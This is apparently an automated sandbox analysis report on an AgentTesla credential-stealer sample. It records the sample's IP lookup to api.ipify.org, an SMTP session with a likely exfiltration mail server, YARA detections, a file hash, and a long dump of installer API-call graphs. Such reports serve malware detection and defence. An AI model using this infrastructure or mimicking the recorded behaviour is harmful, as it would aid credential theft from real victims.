                                                                                            2024-11-06 14:07:17 UTC1378INData Raw: 9e 17 25 9e 28 a0 12 ee 89 fe 21 75 b5 60 a1 4a 3a 12 b7 cb 65 c0 e2 f1 81 66 d4 26 c4 d9 34 b2 cc f8 e6 dd 67 68 ce 21 4a 87 f0 7c a8 88 bc 13 a4 16 7e 69 5e 55 93 fd 0d 36 1e 43 ff f0 77 48 29 8d c6 6d 95 5d da b3 64 78 ba a5 5a 72 45 6d 36 90 e5 5f 3d d1 cd 47 88 68 63 00 39 3c c0 1b bc 5c 3d 6a ce b6 c7 eb d1 f8 2b 61 60 11 99 2c d2 c8 6e 49 2f 90 c6 10 33 d4 29 87 7d 0d 90 f2 87 ab 8f 8b fd cb 28 ad 3e d0 6a 95 7f 08 4a 7d 6b 8e 8b 44 d8 45 43 94 b8 bc 30 19 02 9e 21 2f 32 2a d7 f9 19 89 08 2b aa 47 06 a4 8c 0f a2 86 e5 e3 13 d2 bf d7 bc bf 54 30 2a 0d d5 09 f7 d4 b2 5f a5 fd 5e b6 dd 04 12 0e 1c 0d 4c 73 70 73 97 81 d3 12 8d d5 d9 b3 ba c3 c9 a2 93 f3 ca 69 eb 27 bc a0 7c f3 ea 8e e5 e0 ee 13 a3 57 09 f9 89 c2 e4 63 21 ce c7 b9 60 5b 40 ed 9a 9c 6e
                                                                                            Data Ascii: %(!u`J:ef&4gh!J|~i^U6CwH)m]dxZrEm6_=Ghc9<\=j+a`,nI/3)}(>jJ}kDEC0!/2*+GT0*_^Lspsi'|Wc!`[@n


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.749976104.26.13.2054433260C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-11-06 14:07:20 UTC155OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                            Host: api.ipify.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-11-06 14:07:20 UTC399INHTTP/1.1 200 OK
                                                                                            Date: Wed, 06 Nov 2024 14:07:20 GMT
                                                                                            Content-Type: text/plain
                                                                                            Content-Length: 14
                                                                                            Connection: close
                                                                                            Vary: Origin
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8de5a63b58b42d3f-DFW
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=1942320&cwnd=251&unsent_bytes=0&cid=3533824601d45b7f&ts=194&x=0"
                                                                                            2024-11-06 14:07:20 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30
                                                                                            Data Ascii: 173.254.250.80


                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Nov 6, 2024 15:07:23.087625027 CET5874997767.23.226.139192.168.2.7220-super.nseasy.com ESMTP Exim 4.96.2 #2 Wed, 06 Nov 2024 09:07:23 -0500
                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                            220 and/or bulk e-mail.
                                                                                            Nov 6, 2024 15:07:23.087908030 CET49977587192.168.2.767.23.226.139EHLO 468325
                                                                                            Nov 6, 2024 15:07:23.246176958 CET5874997767.23.226.139192.168.2.7250-super.nseasy.com Hello 468325 [173.254.250.80]
                                                                                            250-SIZE 52428800
                                                                                            250-8BITMIME
                                                                                            250-PIPELINING
                                                                                            250-PIPECONNECT
                                                                                            250-STARTTLS
                                                                                            250 HELP
                                                                                            Nov 6, 2024 15:07:23.246522903 CET49977587192.168.2.767.23.226.139STARTTLS
                                                                                            Nov 6, 2024 15:07:23.396857023 CET5874997767.23.226.139192.168.2.7220 TLS go ahead

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:09:06:00
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\3Pd480eWHA.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:895'816 bytes
                                                                                            MD5 hash:C91D3B24DD89AE81099DB451A512BA38
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:10:44:21
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\Desktop\3Pd480eWHA.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\3Pd480eWHA.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:895'816 bytes
                                                                                            MD5 hash:C91D3B24DD89AE81099DB451A512BA38
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2521682008.0000000035874000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2521682008.000000003586C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2521682008.0000000035841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.5%
                                                                                              Dynamic/Decrypted Code Coverage:13.9%
                                                                                              Signature Coverage:21.2%
                                                                                              Total number of Nodes:1452
                                                                                              Total number of Limit Nodes:39
                                                                                              execution_graph 4748 10001000 4751 1000101b 4748->4751 4758 100014bb 4751->4758 4753 10001020 4754 10001024 4753->4754 4755 10001027 GlobalAlloc 4753->4755 4756 100014e2 wsprintfA 4754->4756 4755->4754 4757 10001019 4756->4757 4760 100014c1 4758->4760 4759 100014c7 4759->4753 4760->4759 4761 100014d3 GlobalFree 4760->4761 4761->4753 4762 4027c1 4763 402a1d 18 API calls 4762->4763 4764 4027c7 4763->4764 4765 402802 4764->4765 4766 4027eb 4764->4766 4772 4026a6 4764->4772 4767 402818 4765->4767 4768 40280c 4765->4768 4769 4027f0 4766->4769 4775 4027ff 4766->4775 4771 405d2e 18 API calls 4767->4771 4770 402a1d 18 API calls 4768->4770 4776 405d0c lstrcpynA 4769->4776 4770->4775 4771->4775 4775->4772 4777 405c6a wsprintfA 4775->4777 4776->4772 4777->4772 4778 401cc2 4779 402a1d 18 API calls 4778->4779 4780 401cd2 SetWindowLongA 4779->4780 4781 4028cf 4780->4781 4782 401a43 4783 402a1d 18 API calls 4782->4783 4784 401a49 4783->4784 4785 402a1d 18 API calls 4784->4785 4786 4019f3 4785->4786 3885 401e44 3886 402a3a 18 API calls 3885->3886 3887 401e4a 3886->3887 3888 404f25 25 API calls 3887->3888 3889 401e54 3888->3889 3901 40549d CreateProcessA 3889->3901 3891 401e5a 3892 401eb0 CloseHandle 3891->3892 3893 401e79 WaitForSingleObject 3891->3893 3894 4026a6 3891->3894 3904 4060e1 3891->3904 3892->3894 3893->3891 3895 401e87 GetExitCodeProcess 3893->3895 3897 401ea4 3895->3897 3898 401e99 3895->3898 3897->3892 3899 401ea2 3897->3899 3908 405c6a wsprintfA 3898->3908 3899->3892 3902 4054d0 CloseHandle 3901->3902 3903 4054dc 3901->3903 3902->3903 3903->3891 3905 4060fe PeekMessageA 3904->3905 3906 4060f4 DispatchMessageA 3905->3906 3907 40610e 3905->3907 3906->3905 3907->3893 3908->3899 4787 402644 4788 40264a 4787->4788 4789 402652 FindClose 4788->4789 4790 4028cf 4788->4790 4789->4790 4791 4026c6 4792 402a3a 18 API calls 4791->4792 4793 4026d4 4792->4793 4794 4026ea 4793->4794 4795 402a3a 18 API calls 4793->4795 4796 40595a 2 API calls 4794->4796 4795->4794 4797 4026f0 4796->4797 4819 40597f GetFileAttributesA CreateFileA 4797->4819 4799 4026fd 4800 4027a0 4799->4800 4801 402709 GlobalAlloc 4799->4801 4802 4027a8 DeleteFileA 4800->4802 4803 4027bb 4800->4803 4804 402722 4801->4804 4805 402797 CloseHandle 4801->4805 4802->4803 4820 4030a4 SetFilePointer 4804->4820 4805->4800 4807 402728 4808 40308e ReadFile 4807->4808 4809 402731 GlobalAlloc 4808->4809 4810 402741 4809->4810 4811 402775 4809->4811 4812 402e9f 32 API calls 4810->4812 4813 405a26 WriteFile 4811->4813 4818 40274e 4812->4818 4814 402781 GlobalFree 4813->4814 4815 402e9f 32 API calls 4814->4815 4817 402794 4815->4817 4816 40276c GlobalFree 4816->4811 4817->4805 4818->4816 4819->4799 4820->4807 3954 4022c7 3955 402a3a 18 API calls 3954->3955 3956 4022d8 3955->3956 3957 402a3a 18 API calls 3956->3957 3958 4022e1 3957->3958 3959 402a3a 18 API calls 3958->3959 3960 4022eb GetPrivateProfileStringA 3959->3960 4821 402847 4822 402a1d 18 API calls 4821->4822 4823 40284d 4822->4823 4824 40285b 4823->4824 4825 40287e 4823->4825 4827 4026a6 4823->4827 4824->4827 4829 405c6a wsprintfA 4824->4829 4826 405d2e 18 API calls 4825->4826 4825->4827 4826->4827 4829->4827 4830 40364a 4831 403655 4830->4831 4832 403659 4831->4832 4833 40365c GlobalAlloc 4831->4833 4833->4832 4136 1000270b 4137 1000275b 4136->4137 4138 1000271b VirtualProtect 4136->4138 4138->4137 4837 1000180d 4839 10001830 4837->4839 4838 10001872 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4841 100019e3 GlobalFree GlobalFree 4838->4841 4839->4838 4840 10001860 GlobalFree 4839->4840 4840->4838 4574 401751 4575 402a3a 18 API calls 4574->4575 4576 401758 4575->4576 4577 401776 4576->4577 4578 40177e 4576->4578 4614 405d0c lstrcpynA 4577->4614 4615 405d0c lstrcpynA 4578->4615 4581 401789 4583 40577e 3 API calls 4581->4583 4582 40177c 4585 405f77 5 API calls 4582->4585 4584 40178f lstrcatA 4583->4584 4584->4582 4608 40179b 4585->4608 4586 406010 2 API calls 4586->4608 4587 4017dc 4589 40595a 2 API calls 4587->4589 4589->4608 4590 4017b2 CompareFileTime 4590->4608 4591 401876 4593 404f25 25 API calls 4591->4593 4592 40184d 4594 404f25 25 API calls 4592->4594 4602 401862 4592->4602 4596 401880 4593->4596 4594->4602 4595 405d0c lstrcpynA 4595->4608 4597 402e9f 32 API calls 4596->4597 4598 401893 4597->4598 4599 4018a7 SetFileTime 4598->4599 4601 4018b9 CloseHandle 4598->4601 4599->4601 4600 405d2e 18 API calls 4600->4608 4601->4602 4603 4018ca 4601->4603 4604 4018e2 4603->4604 4605 4018cf 4603->4605 4607 405d2e 18 API calls 4604->4607 4606 405d2e 18 API calls 4605->4606 4609 4018d7 lstrcatA 4606->4609 4610 4018ea 4607->4610 4608->4586 4608->4587 4608->4590 4608->4591 4608->4592 4608->4595 4608->4600 4611 405502 MessageBoxIndirectA 4608->4611 4613 40597f GetFileAttributesA CreateFileA 4608->4613 4609->4610 4612 405502 MessageBoxIndirectA 4610->4612 4611->4608 4612->4602 4613->4608 4614->4582 4615->4581 4842 401651 4843 402a3a 18 API calls 4842->4843 4844 401657 4843->4844 4845 406010 2 API calls 4844->4845 4846 40165d 4845->4846 4847 401951 4848 402a1d 18 API calls 4847->4848 4849 401958 4848->4849 4850 402a1d 18 API calls 4849->4850 4851 401962 4850->4851 4852 402a3a 18 API calls 4851->4852 4853 40196b 4852->4853 4854 40197e lstrlenA 4853->4854 4856 4019b9 4853->4856 4855 401988 4854->4855 4855->4856 4860 405d0c lstrcpynA 4855->4860 4858 4019a2 4858->4856 4859 4019af lstrlenA 4858->4859 4859->4856 4860->4858 4861 4019d2 4862 402a3a 18 API calls 4861->4862 4863 4019d9 4862->4863 4864 402a3a 18 API calls 4863->4864 4865 4019e2 4864->4865 4866 4019e9 lstrcmpiA 4865->4866 4867 4019fb lstrcmpA 4865->4867 4868 4019ef 4866->4868 4867->4868 4869 4021d2 4870 402a3a 18 API calls 4869->4870 4871 4021d8 4870->4871 4872 402a3a 18 API calls 4871->4872 4873 4021e1 4872->4873 4874 402a3a 18 API calls 4873->4874 4875 4021ea 4874->4875 4876 406010 2 API calls 4875->4876 4877 4021f3 4876->4877 4878 402204 lstrlenA lstrlenA 4877->4878 4882 4021f7 4877->4882 4880 404f25 25 API calls 4878->4880 4879 404f25 25 API calls 4883 4021ff 4879->4883 4881 402240 SHFileOperationA 4880->4881 4881->4882 4881->4883 4882->4879 4882->4883 4884 402254 4885 40225b 4884->4885 4889 40226e 4884->4889 4886 405d2e 18 API calls 4885->4886 4887 402268 4886->4887 4888 405502 MessageBoxIndirectA 4887->4888 4888->4889 4640 4014d6 4641 402a1d 18 API calls 4640->4641 4642 4014dc Sleep 4641->4642 4644 4028cf 4642->4644 4890 1000161a 4891 10001649 4890->4891 4892 10001a5d 18 API calls 4891->4892 4893 10001650 4892->4893 4894 1000168a 4893->4894 4895 1000166d 4893->4895 4901 10001657 4893->4901 4896 10001690 4894->4896 4897 100016b4 4894->4897 4898 100014e2 wsprintfA 4895->4898 4899 10001559 3 API calls 4896->4899 4900 100014e2 wsprintfA 4897->4900 4902 10001672 4898->4902 4905 10001695 4899->4905 4900->4901 4903 10001559 3 API calls 4902->4903 4904 10001678 4903->4904 4907 1000167e GlobalFree 4904->4907 4906 1000169b GlobalFree 4905->4906 4906->4901 4908 100016af GlobalFree 4906->4908 4907->4901 4908->4901 4654 40155b 4655 401577 ShowWindow 4654->4655 4656 40157e 4654->4656 4655->4656 4657 40158c ShowWindow 4656->4657 4658 4028cf 4656->4658 4657->4658 4659 40255c 4660 402a1d 18 API calls 4659->4660 4665 402566 4660->4665 4661 4025d0 4662 4059f7 ReadFile 4662->4665 4663 4025d2 4668 405c6a wsprintfA 4663->4668 4664 4025e2 4664->4661 4667 4025f8 SetFilePointer 4664->4667 4665->4661 4665->4662 4665->4663 4665->4664 4667->4661 4668->4661 4909 40205e 4910 402a3a 18 API calls 4909->4910 4911 402065 4910->4911 4912 402a3a 18 API calls 4911->4912 4913 40206f 4912->4913 4914 402a3a 18 API calls 4913->4914 4915 402079 4914->4915 4916 402a3a 18 API calls 4915->4916 4917 402083 4916->4917 4918 402a3a 18 API calls 4917->4918 4919 40208d 4918->4919 4920 4020cc CoCreateInstance 4919->4920 4921 402a3a 18 API calls 4919->4921 4924 4020eb 4920->4924 4926 402193 4920->4926 4921->4920 4922 401423 25 API calls 4923 4021c9 4922->4923 4925 402173 MultiByteToWideChar 4924->4925 4924->4926 4925->4926 4926->4922 4926->4923 4927 40265e 4928 402664 4927->4928 4929 402668 FindNextFileA 4928->4929 4932 40267a 4928->4932 4930 4026b9 4929->4930 4929->4932 4933 405d0c lstrcpynA 4930->4933 4933->4932 4934 401cde GetDlgItem GetClientRect 4935 402a3a 18 API calls 4934->4935 4936 401d0e LoadImageA SendMessageA 4935->4936 4937 401d2c DeleteObject 4936->4937 4938 4028cf 4936->4938 4937->4938 4939 401662 4940 402a3a 18 API calls 4939->4940 4941 401669 4940->4941 4942 402a3a 18 API calls 4941->4942 4943 401672 4942->4943 4944 402a3a 18 API calls 4943->4944 4945 40167b MoveFileA 4944->4945 4946 40168e 4945->4946 4952 401687 4945->4952 4947 406010 2 API calls 4946->4947 4950 4021c9 4946->4950 4949 40169d 4947->4949 4948 401423 25 API calls 4948->4950 4949->4950 4951 405bc7 38 API calls 4949->4951 4951->4952 4952->4948 3791 405063 3792 405085 GetDlgItem GetDlgItem GetDlgItem 3791->3792 3793 40520e 3791->3793 3837 403f26 SendMessageA 3792->3837 3795 405216 GetDlgItem CreateThread CloseHandle 3793->3795 3796 40523e 3793->3796 3795->3796 3871 404ff7 OleInitialize 3795->3871 3798 40526c 3796->3798 3801 405254 ShowWindow ShowWindow 3796->3801 3802 40528d 3796->3802 3797 4050f5 3806 4050fc GetClientRect GetSystemMetrics SendMessageA SendMessageA 3797->3806 3799 405274 3798->3799 3800 4052c7 3798->3800 3803 4052a0 ShowWindow 3799->3803 3804 40527c 3799->3804 3800->3802 3813 4052d4 SendMessageA 3800->3813 3842 403f26 SendMessageA 3801->3842 3846 403f58 3802->3846 3809 4052c0 3803->3809 3810 4052b2 3803->3810 3843 403eca 3804->3843 3811 40516a 3806->3811 3812 40514e SendMessageA SendMessageA 3806->3812 3815 403eca SendMessageA 3809->3815 3860 404f25 3810->3860 3816 40517d 3811->3816 3817 40516f SendMessageA 3811->3817 3812->3811 3818 405299 3813->3818 3819 4052ed CreatePopupMenu 3813->3819 3815->3800 3838 403ef1 3816->3838 3817->3816 3820 405d2e 18 API calls 3819->3820 3822 4052fd AppendMenuA 3820->3822 3824 40531b GetWindowRect 3822->3824 3825 40532e TrackPopupMenu 3822->3825 3823 40518d 3826 405196 ShowWindow 3823->3826 3827 4051ca GetDlgItem SendMessageA 3823->3827 3824->3825 3825->3818 3828 40534a 3825->3828 3829 4051b9 3826->3829 3830 4051ac ShowWindow 3826->3830 3827->3818 3831 4051f1 SendMessageA SendMessageA 3827->3831 3832 405369 SendMessageA 3828->3832 3841 403f26 SendMessageA 3829->3841 3830->3829 3831->3818 3832->3832 3833 405386 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3832->3833 3835 4053a8 SendMessageA 3833->3835 3835->3835 3836 4053ca GlobalUnlock SetClipboardData CloseClipboard 3835->3836 3836->3818 3837->3797 3839 405d2e 18 API calls 3838->3839 3840 403efc SetDlgItemTextA 3839->3840 3840->3823 3841->3827 3842->3798 3844 403ed1 3843->3844 3845 403ed7 SendMessageA 3843->3845 3844->3845 3845->3802 3847 403f70 GetWindowLongA 3846->3847 3857 403ff9 3846->3857 3848 403f81 3847->3848 3847->3857 3849 403f90 GetSysColor 3848->3849 3850 403f93 3848->3850 3849->3850 3851 403fa3 SetBkMode 3850->3851 3852 403f99 SetTextColor 3850->3852 3853 403fc1 3851->3853 3854 403fbb GetSysColor 3851->3854 3852->3851 3855 403fd2 3853->3855 3856 403fc8 SetBkColor 3853->3856 3854->3853 3855->3857 3858 403fe5 DeleteObject 3855->3858 3859 403fec CreateBrushIndirect 3855->3859 3856->3855 3857->3818 3858->3859 3859->3857 3861 404f40 3860->3861 3869 404fe3 3860->3869 3862 404f5d lstrlenA 3861->3862 3863 405d2e 18 API calls 3861->3863 3864 404f86 3862->3864 3865 404f6b lstrlenA 3862->3865 3863->3862 3866 404f99 3864->3866 3867 404f8c SetWindowTextA 3864->3867 3868 404f7d lstrcatA 3865->3868 3865->3869 3866->3869 3870 404f9f SendMessageA SendMessageA SendMessageA 3866->3870 3867->3866 3868->3864 3869->3809 3870->3869 3878 403f3d 3871->3878 3873 405041 3874 403f3d SendMessageA 3873->3874 3876 405053 OleUninitialize 3874->3876 3875 40501a 3875->3873 3881 401389 3875->3881 3879 403f55 3878->3879 3880 403f46 SendMessageA 3878->3880 3879->3875 3880->3879 3883 401390 3881->3883 3882 4013fe 3882->3875 3883->3882 3884 4013cb MulDiv SendMessageA 3883->3884 3884->3883 3909 402364 3910 40236a 3909->3910 3911 402a3a 18 API calls 3910->3911 3912 40237c 3911->3912 3913 402a3a 18 API calls 3912->3913 3914 402386 RegCreateKeyExA 3913->3914 3915 4023b0 3914->3915 3917 4026a6 3914->3917 3916 4023c8 3915->3916 3918 402a3a 18 API calls 3915->3918 3921 402a1d 18 API calls 3916->3921 3924 4023d4 3916->3924 3920 4023c1 lstrlenA 3918->3920 3919 4023ef RegSetValueExA 3923 402405 RegCloseKey 3919->3923 3920->3916 3921->3924 3923->3917 3924->3919 3926 402e9f 3924->3926 3928 402eb5 3926->3928 3927 402ee3 3946 40308e 3927->3946 3928->3927 3951 4030a4 SetFilePointer 3928->3951 3932 403011 3932->3919 3933 402f00 GetTickCount 3933->3932 3939 402f2c 3933->3939 3934 403027 3935 403069 3934->3935 3938 40302b 3934->3938 3936 40308e ReadFile 3935->3936 3936->3932 3937 40308e ReadFile 3937->3939 3938->3932 3940 40308e ReadFile 3938->3940 3941 405a26 WriteFile 3938->3941 3939->3932 3939->3937 3942 402f82 GetTickCount 3939->3942 3943 402fa7 MulDiv wsprintfA 3939->3943 3949 405a26 WriteFile 3939->3949 3940->3938 3941->3938 3942->3939 3944 404f25 25 API calls 3943->3944 3944->3939 3952 4059f7 ReadFile 3946->3952 3950 405a44 3949->3950 3950->3939 3951->3927 3953 402eee 3952->3953 3953->3932 3953->3933 3953->3934 4953 4042e8 4954 4042f8 4953->4954 4955 40431e 4953->4955 4957 403ef1 19 API calls 4954->4957 4956 403f58 8 API calls 4955->4956 4958 40432a 4956->4958 4959 404305 SetDlgItemTextA 4957->4959 4959->4955 3993 401dea 3994 402a3a 18 API calls 3993->3994 3995 401df0 3994->3995 3996 402a3a 18 API calls 3995->3996 3997 401df9 3996->3997 3998 402a3a 18 API calls 3997->3998 3999 401e02 3998->3999 4000 402a3a 18 API calls 3999->4000 4001 401e0b 4000->4001 4005 401423 4001->4005 4004 401e3f 4006 404f25 25 API calls 4005->4006 4007 401431 ShellExecuteA 4006->4007 4007->4004 4139 4030ec SetErrorMode GetVersion 4140 403123 4139->4140 4141 403129 4139->4141 4142 4060a5 5 API calls 4140->4142 4143 406037 3 API calls 4141->4143 4142->4141 4144 40313f lstrlenA 4143->4144 4144->4141 4145 40314e 4144->4145 4146 4060a5 5 API calls 4145->4146 4147 403156 4146->4147 4148 4060a5 5 API calls 4147->4148 4149 40315d #17 OleInitialize SHGetFileInfoA 4148->4149 4227 405d0c lstrcpynA 4149->4227 4151 40319a GetCommandLineA 4228 405d0c lstrcpynA 4151->4228 4153 4031ac GetModuleHandleA 4154 4031c3 4153->4154 4155 4057a9 CharNextA 4154->4155 4156 4031d7 CharNextA 4155->4156 4164 4031e7 4156->4164 4157 4032b1 4158 4032c4 GetTempPathA 4157->4158 4229 4030bb 4158->4229 4160 4032dc 4161 4032e0 GetWindowsDirectoryA lstrcatA 4160->4161 4162 403336 DeleteFileA 4160->4162 4165 4030bb 12 API calls 4161->4165 4239 402c66 GetTickCount GetModuleFileNameA 4162->4239 4163 4057a9 CharNextA 4163->4164 4164->4157 4164->4163 4168 4032b3 4164->4168 4167 4032fc 4165->4167 4167->4162 4170 403300 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4167->4170 4323 405d0c lstrcpynA 4168->4323 4169 40334a 4171 4033e0 4169->4171 4174 4033d0 4169->4174 4179 4057a9 CharNextA 4169->4179 4173 4030bb 12 API calls 4170->4173 4326 4035b2 4171->4326 4177 40332e 4173->4177 4267 40368c 4174->4267 4177->4162 4177->4171 4182 403365 4179->4182 4180 403518 4184 403520 GetCurrentProcess OpenProcessToken 4180->4184 4185 40359a ExitProcess 4180->4185 4181 4033fa 4333 405502 4181->4333 4188 403410 4182->4188 4189 4033ab 4182->4189 4190 40356b 4184->4190 4191 40353b LookupPrivilegeValueA AdjustTokenPrivileges 4184->4191 4337 405485 4188->4337 4192 40586c 18 API calls 4189->4192 4194 4060a5 5 API calls 4190->4194 4191->4190 4195 4033b6 4192->4195 4197 403572 4194->4197 4195->4171 4324 405d0c lstrcpynA 4195->4324 4200 403587 ExitWindowsEx 4197->4200 4203 403593 4197->4203 4198 403431 lstrcatA lstrcmpiA 4198->4171 4202 40344d 4198->4202 4199 403426 lstrcatA 4199->4198 4200->4185 4200->4203 4206 403452 4202->4206 4207 403459 4202->4207 4350 40140b 4203->4350 4205 4033c5 4325 405d0c lstrcpynA 4205->4325 4340 4053eb CreateDirectoryA 4206->4340 4345 405468 CreateDirectoryA 4207->4345 4212 40345e SetCurrentDirectoryA 4213 403478 4212->4213 4214 40346d 4212->4214 4349 405d0c lstrcpynA 4213->4349 4348 405d0c lstrcpynA 4214->4348 4217 405d2e 18 API calls 4218 4034b7 DeleteFileA 4217->4218 4219 4034c4 CopyFileA 4218->4219 4224 403486 4218->4224 4219->4224 4220 40350c 4221 405bc7 38 API calls 4220->4221 4221->4171 4222 405bc7 38 API calls 4222->4224 4223 405d2e 18 API calls 4223->4224 4224->4217 4224->4220 4224->4222 4224->4223 4225 40549d 2 API calls 4224->4225 4226 4034f8 CloseHandle 4224->4226 4225->4224 4226->4224 4227->4151 4228->4153 4230 405f77 5 API calls 4229->4230 4232 4030c7 4230->4232 4231 4030d1 4231->4160 4232->4231 4233 40577e 3 API calls 4232->4233 4234 4030d9 4233->4234 4235 405468 2 API calls 4234->4235 4236 4030df 4235->4236 4353 4059ae 4236->4353 4357 40597f GetFileAttributesA CreateFileA 4239->4357 4241 402ca6 4260 402cb6 4241->4260 4358 405d0c lstrcpynA 4241->4358 4243 402ccc 4244 4057c5 2 API calls 4243->4244 4245 402cd2 4244->4245 4359 405d0c lstrcpynA 4245->4359 4247 402cdd GetFileSize 4248 402dd9 4247->4248 4266 402cf4 4247->4266 4360 402c02 4248->4360 4250 402de2 4252 402e12 GlobalAlloc 4250->4252 4250->4260 4372 4030a4 SetFilePointer 4250->4372 4251 40308e ReadFile 4251->4266 4371 4030a4 SetFilePointer 4252->4371 4255 402e45 4257 402c02 6 API calls 4255->4257 4256 402e2d 4259 402e9f 32 API calls 4256->4259 4257->4260 4258 402dfb 4261 40308e ReadFile 4258->4261 4264 402e39 4259->4264 4260->4169 4262 402e06 4261->4262 4262->4252 4262->4260 4263 402c02 6 API calls 4263->4266 4264->4260 4264->4264 4265 402e76 SetFilePointer 4264->4265 4265->4260 4266->4248 4266->4251 4266->4255 4266->4260 4266->4263 4268 4060a5 5 API calls 4267->4268 4269 4036a0 4268->4269 4270 4036a6 4269->4270 4271 4036b8 4269->4271 4382 405c6a wsprintfA 4270->4382 4272 405bf3 3 API calls 4271->4272 4273 4036e3 4272->4273 4275 403701 lstrcatA 4273->4275 4277 405bf3 3 API calls 4273->4277 4276 4036b6 4275->4276 4373 403951 4276->4373 4277->4275 4280 40586c 18 API calls 4281 403733 4280->4281 4282 4037bc 4281->4282 4284 405bf3 3 API calls 4281->4284 4283 40586c 18 API calls 4282->4283 4285 4037c2 4283->4285 4286 40375f 4284->4286 4287 4037d2 LoadImageA 4285->4287 4288 405d2e 18 API calls 4285->4288 4286->4282 4291 40377b lstrlenA 4286->4291 4295 4057a9 CharNextA 4286->4295 4289 403878 4287->4289 4290 4037f9 RegisterClassA 4287->4290 4288->4287 4294 40140b 2 API calls 4289->4294 4292 403882 4290->4292 4293 40382f SystemParametersInfoA CreateWindowExA 4290->4293 4296 403789 lstrcmpiA 4291->4296 4297 4037af 4291->4297 4292->4171 4293->4289 4298 40387e 4294->4298 4300 403779 4295->4300 4296->4297 4301 403799 GetFileAttributesA 4296->4301 4299 40577e 3 API calls 4297->4299 4298->4292 4302 403951 19 API calls 4298->4302 4303 4037b5 4299->4303 4300->4291 4304 4037a5 4301->4304 4305 40388f 4302->4305 4383 405d0c lstrcpynA 4303->4383 4304->4297 4307 4057c5 2 API calls 4304->4307 4308 40389b ShowWindow 4305->4308 4309 40391e 4305->4309 4307->4297 4311 406037 3 API calls 4308->4311 4310 404ff7 5 API calls 4309->4310 4312 403924 4310->4312 4313 4038b3 4311->4313 4314 403940 4312->4314 4315 403928 4312->4315 4316 4038c1 GetClassInfoA 4313->4316 4318 406037 3 API calls 4313->4318 4317 40140b 2 API calls 4314->4317 4315->4292 4321 40140b 2 API calls 4315->4321 4319 4038d5 GetClassInfoA RegisterClassA 4316->4319 4320 4038eb DialogBoxParamA 4316->4320 4317->4292 4318->4316 4319->4320 4322 40140b 2 API calls 4320->4322 4321->4292 4322->4292 4323->4158 4324->4205 4325->4174 4327 4035ca 4326->4327 4328 4035bc CloseHandle 4326->4328 4385 4035f7 4327->4385 4328->4327 4331 4055ae 69 API calls 4332 4033e9 OleUninitialize 4331->4332 4332->4180 4332->4181 4334 405517 4333->4334 4335 403408 ExitProcess 4334->4335 4336 40552b MessageBoxIndirectA 4334->4336 4336->4335 4338 4060a5 5 API calls 4337->4338 4339 403415 lstrcatA 4338->4339 4339->4198 4339->4199 4341 40543c GetLastError 4340->4341 4342 403457 4340->4342 4341->4342 4343 40544b SetFileSecurityA 4341->4343 4342->4212 4343->4342 4344 405461 GetLastError 4343->4344 4344->4342 4346 405478 4345->4346 4347 40547c GetLastError 4345->4347 4346->4212 4347->4346 4348->4213 4349->4224 4351 401389 2 API calls 4350->4351 4352 401420 4351->4352 4352->4185 4354 4059b9 GetTickCount GetTempFileNameA 4353->4354 4355 4030ea 4354->4355 4356 4059e6 4354->4356 4355->4160 4356->4354 4356->4355 4357->4241 4358->4243 4359->4247 4361 402c23 4360->4361 4362 402c0b 4360->4362 4365 402c33 GetTickCount 4361->4365 4366 402c2b 4361->4366 4363 402c14 DestroyWindow 4362->4363 4364 402c1b 4362->4364 4363->4364 4364->4250 4367 402c41 CreateDialogParamA ShowWindow 4365->4367 4368 402c64 4365->4368 4369 4060e1 2 API calls 4366->4369 4367->4368 4368->4250 4370 402c31 4369->4370 4370->4250 4371->4256 4372->4258 4374 403965 4373->4374 4384 405c6a wsprintfA 4374->4384 4376 4039d6 4377 405d2e 18 API calls 4376->4377 4378 4039e2 SetWindowTextA 4377->4378 4379 403711 4378->4379 4380 4039fe 4378->4380 4379->4280 4380->4379 4381 405d2e 18 API calls 4380->4381 